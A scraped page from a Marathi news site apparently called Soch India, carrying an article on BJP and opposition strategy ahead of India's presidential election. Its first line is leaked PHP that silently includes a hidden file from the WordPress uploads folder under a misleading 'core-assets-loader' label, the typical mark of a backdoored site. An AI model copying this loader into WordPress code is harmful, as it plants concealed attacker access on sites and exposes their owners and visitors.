add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); राष्ट्रपती पदासाठी काय असेल भाजप, विरोधकांची रणनिती? – SOCH INDIA
Menu

राष्ट्रपती पदासाठी काय असेल भाजप, विरोधकांची रणनिती?

nobanner

केंद्रीय निवडणूक आयोगाने राष्ट्रपती पदाच्या निवडणुकीचा कार्यक्रम जाहीर केल्यानंतर आता भाजपप्रणित राष्ट्रीय लोकशाही आघाडी (एनडीए) आणि काँग्रेसप्रणित संयुक्त पुरोगामी आघाडी (यूपीए) यांच्यासह भाजपविरोधी प्रादेशिक पक्षांच्या राजकीय हालचाली गतिमान झाल्या आहेत.’एनडीए’’च्या सहमतीच्या उमेदवाराला विजयी होण्यात फारशी अडचणी येणार नाही हे जरी खरे असले तरी, भाजपला नवीन पटनायक यांचा बिजू जनता दल, जगनमोहन रेड्डी यांचा वायएसआर काँग्रेस या दोन प्रादेशिक पक्षांची मदत लागेल. बिहारमध्ये नितीश कुमार यांचा जनता दल (सं) ‘’एनडीए’’मध्ये असला तरी, नितीश कुमार यांची कोंडी करण्यासाठी भाजपकडून सातत्याने कुरापती काढल्या जात आहेत. त्याचा राष्ट्रपती पदाच्या मतदानावेळी फटका बसू नये याची दक्षता भाजपला घ्यावी लागणार आहे. कुंपणावर बसलेले दोन पक्ष आणि दूर जात असलेला मित्रपक्ष यांची मनधरणी करण्यासाठी भाजपने प्रयत्न सुरू केले आहेत. गेल्या महिन्यामध्ये केंद्रीयमंत्री धर्मेंद्र प्रधान यांना मतभेद मिटवण्यासाठी नितीशकुमार यांच्याकडे पाठवले होते. या दोघांमधील चर्चेची माहिती प्रदेश भाजपलाही देण्यात आली नव्हती. नवीन पटनायक यांनी गेल्या महिन्याच्या अखेरीस, तर जगनमोहन रेड्डी यांनी गेल्या आठवड्यात दिल्लीत येऊन पंतप्रधान नरेंद्र मोदी यांची भेट घेतली होती.